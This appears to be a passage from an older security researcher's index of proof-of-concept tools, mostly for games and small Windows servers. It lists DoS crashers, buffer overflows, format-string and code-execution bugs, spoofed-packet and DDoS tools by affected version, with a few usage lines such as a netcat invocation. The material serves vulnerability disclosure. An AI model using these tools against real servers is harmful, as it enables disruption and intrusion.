open it with W32Dasm and the return address will be overwritten with 0xdeadc0de (the executable is a simple "void main(void)" compiled with Lcc and with a very long imported function name)
- Skin file to test the arbitrary files overwriting in DivX Player <= 2.6 (divxplayerbug)
updated 07 Feb 2005
- Breed <= patch #1 zero-length crash 0.1 (breedzero)
- Amp II engine (Gore <= 1.50) socket unreachable 0.1 (amp2zero)
- SOLDNER Secret Wars <= 30830 socket termination 0.1 (soldnersock)
- Lithtech engine (new protocol) socket unreachable 0.1.1 (lithsock)
Contract Jack <= 1.1, No one lives forever 2 <= 1.3, Tron 2.0 <= 1.042 and F.E.A.R. <= 1.02
- Codename Eagle <= 1.42 socket unreachable 0.1 (ceaglesock)
- Gore <= 1.49 Gamespy cd-key SDK buffer-overflow 0.1 (goregsbof)
- Battlefield broadcast client crash 0.1 (bfcboom)
Battlefield 1942 <= 1.6.19 and Vietnam <= 1.2
- Kreed <= 1.05 format string, message too long and scripts bugs 0.1 (kreedexec)
- Jana Server <= 2.4.4 http/pna DoS 0.1 (janados)
- Orbz <= 2.10 buffer-overflow 0.1 (orbzbof)
- Serious engine Fake Players DoS (ssfakep)
originally a fake players tool, but it is also able to crash the servers of the Serious engine games using the UDP protocol
- Star Wars Battlefront Fake Players DoS and Tester (swbfp)
a fake players tool that can also be used to test the security bugs affecting versions <= 1.11 of the server
- Soldier of Fortune II <= 1.3 server and client crash/stop 0.1 (sof2boom)
- Halo <= 1.05 broadcast client crash 0.1 (halocboom)
- 602 Lan Suite <= 2004.0.04.0909 resources consumption 0.1 (602res)
- Master of Orion III <= 1.2.5 server crash 0.1 (moo3boom)
- Age of Sail II <= 1.04.151 server buffer overflow 0.1 (aos2bof)
- Vypress Tonecast receiver <= 1.3 broadcast crash 0.1 (toneboom)
- ShixxNote 6.net buffer overflow 0.1 (shixxbof)
- \secure\ buffer overflow in some old Monolith games 0.1.1 (lithsec)
Alien versus predator 2, Blood 2, No one lives forever and Shogo
- Flash Messaging <= 5.2.0g (rev 1.1.2) server crash and decoder 0.1 (flashmsg)
A proof-of-concept but also a client emulator to see the decoded data
- VyPress Messenger <= 3.5.1 broadcast buffer-overflow 0.1 (vymesbof)
- Icecast <= 2.0.1 Win32 remote code execution 0.1 (iceexec)
- Chatman <= 1.5.1 RC1 broadcast crash 0.1a (chatmanx)
- Buffer-overflow in Zinf 2.2.1 for Windows through PLS file
- ActivePost File-Server <= 3.1 traversal file uploader 0.1 (actpup)
- ActivePost File-Server <= 3.1 crash 0.1 (actpboom)
- PopMessenger <= 1.60 (20 Sep 2004) remote crash 0.1 (popmsgboom)
- Lords of the Realm III <= 1.01 server crash 0.1 (lotr3boom)
- Pigeon server <= 3.02.0143 freeze 0.1 (pigeonx)
- Halo <= 1.04 remote server crash 0.1 (haloboom)
- Call of Duty <= 1.4 server/client shutdown 0.1.1 (codboom)
- Ground Control <= 1.0.0.7 server/client crash 0.1 (gc2boom)
- Painkiller <= 1.31 code execution bug 0.1 (painkex)
- Medal of Honor buffer-overflow 0.1 (mohaabof)
Vulnerable: AA 1.11v9, SH 2.15, BT 2.40b
- Unreal engine \secure\ crash 0.1 (unsecure)
and the spoofed version for Linux
- Chat Anywhere <= 2.72a DoS and passive browsers DoS 0.1 (chatanydos)
- Toca Race Driver 1 multiple DoS 0.1.1 (rdboom)
- Colin McRae Rally 04 1.0 broadcast client crash 0.1 (cmr4cdos)
- UMOD arbitrary file overwriting proof-of-concept maker 0.1 (umodpoc)
- DoS in Rsniff 1.0 (emptyconn)
Use "emptyconn server 10001"
- IGI 2 <= 1.3 server RCON format string 0.1 (igi2fs)
- Gangland client click and freeze bug 0.1 (gangcfreeze)
Explanation is located in the file gangcfreeze.c
- StarShatter Fake Players DoS (sshatfp)
fake players and server freeze/crash (<= 3.9.0 versions)
- Testing tool for RogerWilco 0.4 (wilco)
This proof-of-concept is able to test ALL the vulnerabilities I have found in this program.
It also contains a lot of very useful functions and shows a lot of information
- Etherlords 1 (1.07) and 2 (1.03) server crash 0.1 (ethboom)
- Picophone <= 1.63 log buffer overflow and DoS 0.1 (picobof)
- The Rage remote server freeze 0.1 (ragefreeze)
- Terminator 3 <= 1.0 broadcast client buffer-overflow 0.1.2 (t3cbof)
- Chrome <= 1.2.0.0 server crash 0.1 (chromeboom)
- Battle Mages automatic LAN server freeze 0.1 (battlemagx)
- Battle Mages server freeze 0.1 (battlemagy)
- Battle Isle: The Andosia War 2.08 remote client crash/freeze 0.1a (bisle-client)
- Battle Isle: The Andosia War 2.08 remote server crash 0.1 (bisleboom)
- Chat Anywhere 2.72 ghost user proof-of-concept (ca-ghost)
html file that sends %00 (hidden nickname) in plain text, because almost all browsers send it encoded as %2500
- Freespace <= 1.2 client buffer overflow 0.1 (fs2cbof)
- RedFaction <= 1.20 broadcast clients buffer overflow 0.1 (rfcbof)
- Red Faction demo and retail 1.00 server buffer overflow 0.1 (rfdbof)
works versus any demo version and the very old retail version 1.00
- Gamespy hidden cd-key SDK: remote server crash 0.1.1 (gshboom)
Vulnerable games: Battlefield 1942, Contract Jack, Gore, Halo, Hidden & Dangerous 2, IGI 2: Covert Strike, Judge Dredd: Dredd vs. Death, Need For Speed Hot Pursuit 2, TRON 2.0 and others...
- Ghost Recon engine remote crash/system freeze 0.1 (grboom)
- Haegemonia <= 1.07 remote and Desert Rats vs. Afrika Korps server crash 0.1.1 (hgmcrash)
- Team Factor <= 1.25m remote server crash 0.1 (tfboom)
- Purge <= 1.4.7 and Jihad <= 2.0.1 broadcast client's buffer overflow 0.1 (purge-cbof)
- Ratbag's game engine Denial of Service 0.1 (ratbagcpu)
- Monkey httpd <= 0.8.1 remote DoS 0.1 (monkeydos)
- Chaser <= 1.50 remote client crash (both LAN and Internet) 0.1a (chaser-client)
- Chaser <= 1.50 remote server crash 0.1 (chasercrash)
- Big Scale Racing <= 1.04h Fake players DoS and crasher/freezer (bsrfpcrash)
- Need for Speed Hot pursuit 2 <= 242 client's buffer overflow (nfshp2cbof)
- Xitami <= 2.5c1 server crash and possible (???) code execution through malformed SSI files (ssi-xitami)
The zip file contains some examples of SSI files to use locally on the Xitami webserver to crash it, but probably the most interesting example is toobig.ssi, which is able to point the code flow to 0x58585858 (tested on Win32). I'm not able to say whether code execution is really possible and I don't have other info about the problem.
- WebCam Live 2.01 and PhotoHost 4.0 negative Content-Length DoS 0.1 (wcamdos)
- Resources consumption in Goahead webserver <= 2.1.8 (webpostmem)
- WWW Fileshare Pro < 2.42 remote crash (webpostmem)
"webpostmem 2000 1 server" or "webpostmem 3000 1 server"
- WWW Fileshare Pro < 2.42 arbitrary files overwriting (wfshare-up)
This file contains the data to send to the server to create a file called badfile.txt in c:\
- Worms Armageddon (LAN) Fake invisible players DoS and match freeze 0.1 (wormsafp)
It is not only a fake-players DoS but also freezes the current match a bit. It works only versus LAN servers and I have tested it only versus version 3.0.5.0beta2
- Jordan's Windows Telnet Server remote buffer-overflow 0.1 (jordwts)
- Serious Sam TCP remote crash/freeze 0.1 (ssboom)
This proof-of-concept should run versus all the games based on the Serious Sam engine using the TCP protocol. Serious Sam First and Second Encounter <= 1.05 are vulnerable (Second Encounter 1.07 is NOT vulnerable because it uses UDP)
- Soldat permanent ban of a custom IP 0.1 (soldbanip)
This simple proof-of-concept sends an incomplete spoofed UDP packet to join a server of the game called Soldat. The result is the permanent ban of the source IP (runs on GNU/Linux only)
Remember to update the join packet because new game versions use different packets!
- Tzar <= 1.10 fake players bug and remote crash (tzarff)
- Medieval Total War <= 1.1 broadcast kick and crash 0.1 (mtwdos-server)
(first argument equal to 0 = kick, greater than or equal to 76 = crash)
- Medieval Total War <= 1.1 client's bugs 0.1 (mtw2client)
- Fake IRC server for Gamespy3d <= 263015 code execution 0.1 (gs3dirc)
- Half-Life 1.1.1.0 client's "Unknown command" format string bug test 0.1a (hlclientfs)
This is a tool to test a format string bug I have found in the Half-Life client. I have not released an advisory because at the moment I don't know whether this bug allows remote code execution or not. Feel free to check it (in the zip file there is also the mail I have sent to vuln-dev containing some details)
- NULLhttpd <= 0.5.1 remote resources consumption (webpostmem)
- NULLhttpd <= 0.5.1 XSS through Bad request (nullhttpd051-xss)
- SpeakFreely for Win <= 7.6a remote crash through malformed GIF (sfgif)
- SpeakFreely for Win <= 7.6a spoofed DoS (sfdos)
- Winamp 2.91 (IN_MIDI.DLL 3.01) examples (winamp-midi-example)
- Quake 3 engine client disconnector 0.2 (q3noclient)
How to disconnect a client based on the Quake 3 engine with only one spoofed packet
- Half-Life server buffer overflow and freeze 0.2.2 (hlbof-server)
Simple proof-of-concept for testing the vulnerable Half-Life servers. It will show a message in the console if you test the dedicated server 1.1.1.0; likewise the return address will be overwritten by 0x063c27f5
01 Mar 2004: Greuff (greuff@void.at) has released an exploit about this vulnerability: http://www.void.at/greuff/hoagie_hlserver.c
- Half-Life <= 1.1.1.0 passive buffer-overflow test 0.1 (hlbof-client)
This proof-of-concept waits for vulnerable Half-Life clients and crashes them. Use a debugger to see the exception and the overwritten return address (overwritten by 0x2e504945)
- Quake 3 con/con proof-of-concept + heartbeat emulator (q3concon)
This proof-of-concept is a fake Quake 3 server that sends a message containing the con\con string to all the clients that try to get information from it. If the client that receives the string is a Windows95/98/98SE system without the con\con patch, it will crash immediately. The problem happens on some games based on the Quake 3 engine. I have personally tested Quake 3 and Soldier of Fortune 2. The games I have tested that are NOT vulnerable are Return to Castle Wolfenstein and Medal of Honor: Allied Assault
- UnrealTournament 2003 Passive DoS (ut2003pdos)
vulnerable versions: retail v2199 and v2206 demo without fixed IpDrv library
- Edonkey2000 and Overnet <= 0.45 message flooder and Emule <= 0.27b remote crasher 0.1.1 (eddos)
- Master Server full DDoS tool 0.1.1 (msddos)
(+ Quake3 Master server statistics!)
- Unreal engine research Proof-of-Concept (research)
(UT2003 versions greater than 2166 and UT greater than 436 are NOT vulnerable; I don't know which games are still vulnerable)
- Unreal eater/crasher (unrcrash) 0.2.2 (unrcrash)
UDP packet for eating memory or crashing remote systems that run a game based on the Unreal engine (Unreal 1 is not vulnerable)
- UnrDoS 0.1 (unrdos)
Unreal engine network loopback DoS (successfully tested versus UT and UT2003)
- UT2003Bounce 0.1 (ut2003bounce)
Ping-pong network proof-of-concept for Unreal Tournament 2003 (UT2003 ONLY)
- UT v436 code execution (Win98 ONLY) (ut436)
This proof-of-concept must be used with the Windows version of UnrealTournament v436 (both UCC and game) on Win98 ONLY. It contains 2 map files that spawn a simple message in console for UCC or a MessageBox for the game.
If you use UCC: copy ut-ucc436.unr in the Maps dir and run "ucc server ut-ucc436.unr"
If you use the game: copy DM-ut436.unr in the Maps dir, run the UT game and select the map from the Deathmatch maps
- Bladeenc 0.94.2 for Windows i586 proof-of-concept (for Win98 ONLY) (blade586-942)
The PoC is based on the precompiled binary you can find here
- Savant 3.1 cgitest.exe blue-screen, crash & close
Usage: nc <host> 80 -v -v -n < savant-cgitest.txt
- Abyss 1.0.3 (patch 1) administration bug (abyss-adm)
- Pegasus mail 4.01 DoS (pegasus)
- Popcorn mail client 1.20 multiple DoS attacks (popcorn)
- Unreal Tournament single DDoS (utflood)
- CheckBo 1.56 multiple DoS (poc 0.2) (checkbo)
- UTDDoS 0.4 (utddos)
Full DoS & DDoS attack using UnrealTournament and UT2003 servers. This code is also very interesting for whoever wants to know how to get the server list from the official master servers used by Epic, because it can retrieve both UT and UT2003 lists (note that UT > 436 and UT2003 > 2166 are NO longer vulnerable to this passive DoS)